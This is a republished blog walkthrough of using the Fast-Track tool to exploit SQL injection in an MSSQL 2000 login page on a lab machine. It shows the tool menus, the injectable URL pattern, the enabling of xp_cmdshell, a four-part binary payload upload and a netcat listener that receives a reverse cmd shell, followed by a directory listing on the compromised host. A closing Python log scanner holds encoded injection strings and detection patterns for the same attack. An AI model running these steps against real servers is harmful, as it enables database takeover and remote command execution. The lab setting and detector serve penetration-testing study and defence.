MSSQL2K - SQL Injector - Query String Parameter Attack combined with netcat to obtain a reverse cmdshell
Source: Internet  Editor: 程序博客网  Time: 2024/06/03 09:22
Fast-Track steps:
root@bt:~# cd /pentest/exploits/fasttrack/
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
******************************************************
** Performing dependency checks...                  **
******************************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

*****************************************************************
**                                                             **
**           Fast-Track - A new beginning...                   **
**           Version: 4.0.2                                    **
**           Written by: David Kennedy (ReL1K)                 **
**           Lead Developer: Joey Furr (j0fer)                 **
**           http://www.secmaniac.com                          **
**                                                             **
*****************************************************************

Fast-Track Main Menu:

    1. Fast-Track Updates
    2. Autopwn Automation
    3. Nmap Scripting Engine
    4. Microsoft SQL Tools
    5. Mass Client-Side Attack
    6. Exploits
    7. Binary to Hex Payload Converter
    8. Payload Generator
    9. Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

Enter the number: 4

(banner repeated)

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

Enter your choice : 1

(banner repeated)

Enter which SQL Injector you want to use:

    1. SQL Injector - Query String Parameter Attack
    2. SQL Injector - POST Parameter Attack
    3. SQL Injector - GET FTP Payload Attack
    4. SQL Injector - GET Manual Setup Binary Payload Attack

    (q)uit

Enter your choice: 1

(banner repeated)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Requirements: PExpect
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This module uses a reverse shell by using the binary2hex method for uploading.
It does not require FTP or any other service, instead we are using the debug
function in Windows to generate the executable.

You will need to designate where in the URL the SQL Injection is by using
'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter
Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

<ctrl>-c to exit to Main Menu...

Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated. Use the subprocess module.
  ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
You should have a shell if everything went good..Might take a couple seconds
In a second bash shell, start nc listening:
root@bt:~# nc -l -p 4444
When Fast-Track prints:
Running the payload on the server...
nc receives the connection:
root@bt:~# nc -l -p 4444
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,919,802,368 可用字节

C:\>exit
exit
root@bt:~#
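A defender-side check, added here and not part of the original post or of Fast-Track: it scans constructed web-server access-log lines for the artefacts this run leaves in the query string (xp_cmdshell, the sp_configure call that enables it, and the DEBUG-based upload) and flags a source that sends a burst of such requests to one path, which is how the four-part payload upload looks from the server side. The log layout, IPs and sample values are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample records (not from the original post) in a W3C-like
# "date time client-ip method uri-stem uri-query status" layout.
SAMPLE_LOG = """\
2013-07-06 17:58:01 192.168.1.109 GET /mssql2k/login username=alice 200
2013-07-06 17:58:02 10.0.0.5 GET /mssql2k/login username=%27%3Bexec+master..xp_cmdshell 500
2013-07-06 17:58:03 10.0.0.5 GET /mssql2k/login username=%27%3Bexec+sp_configure+%27xp_cmdshell%27%2C1 500
2013-07-06 17:58:04 10.0.0.5 GET /mssql2k/login username=%27%3Bexec+master..xp_cmdshell+%27echo+e+100%27 500
2013-07-06 17:58:05 10.0.0.5 GET /mssql2k/login username=%27%3Bexec+master..xp_cmdshell+%27debug%27 500
2013-07-06 17:58:09 192.168.1.109 GET /mssql2k/login username=bob 200
"""

# Keywords the tool's run above depends on: xp_cmdshell, enabling it via
# sp_configure, and Windows DEBUG to rebuild the uploaded binary.
INDICATORS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "sp_configure": re.compile(r"sp_configure", re.I),
    "debug_exe": re.compile(r"\bdebug\b", re.I),
}

def parse_line(line):
    """Split one record into fields; returns None for short/blank lines."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, ip, _method, path, query, status = parts[:7]
    # Decode percent-escapes and '+' so encoded keywords become visible.
    return {"ip": ip, "path": path, "query": unquote_plus(query), "status": status}

def classify(query):
    """Sorted indicator names matching an already-decoded query string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))

def scan(log_text):
    """Return (ip, path, indicators) for every record carrying an indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (hits := classify(rec["query"])):
            findings.append((rec["ip"], rec["path"], hits))
    return findings

def staged_sources(findings, threshold=3):
    """IPs with >= threshold flagged requests to one path: a multi-part
    payload upload like the 4/4 sequence above shows up as such a burst."""
    counts = Counter((ip, path) for ip, path, _ in findings)
    return sorted({ip for (ip, _), n in counts.items() if n >= threshold})
```

Feed real access logs through `scan` and alert on `staged_sources`; a single flagged request is worth triage, but a burst from one source to one path is the pattern to page on.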